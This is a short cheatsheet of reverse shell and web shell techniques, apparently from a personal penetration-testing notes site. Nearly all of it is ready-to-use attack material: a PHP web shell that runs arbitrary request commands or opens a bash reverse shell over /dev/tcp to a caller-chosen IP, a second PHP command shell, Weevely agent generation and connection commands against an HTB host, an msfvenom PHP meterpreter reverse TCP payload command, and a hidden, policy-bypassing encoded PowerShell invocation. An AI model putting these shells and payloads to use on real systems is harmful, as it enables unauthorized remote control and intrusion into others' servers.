Reverse Shell [ cheatsheet ]

PHP

<?php

 $port = (isset($_REQUEST['port'])) ? $_REQUEST['port'] : '1234' ; 

 if(isset($_REQUEST['ip'])) {
   exec("/bin/bash -c 'bash -i >& /dev/tcp/". $_REQUEST['ip'] ."/". $port . " 0>&1'");
 } elseif(isset($_REQUEST['cmd'])) {
   echo exec($_REQUEST['cmd']);
 }

?>

<?php
    if(isset($_GET['cmd']))
    {
        echo system($_GET['cmd']);
    }
?>

Weevely

Generate an agent

/usr/share/weevely/weevely.py generate 123 reverse.php

Upload agent file on the server

Connect to the agent

/usr/share/weevely/weevely.py http://thetoppers.htb/reverse.php 123

Msfvenom

# Create metasploit payload (i.e. php).
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD==

Recent Posts

Tags

Actions, Github, Kali, Python, Windows, address, alias, build, env, ip, jekyll, mask, pip, rebuild, toolbar, variables, venv, virtualenv, vpn, vpnip, whoami, x86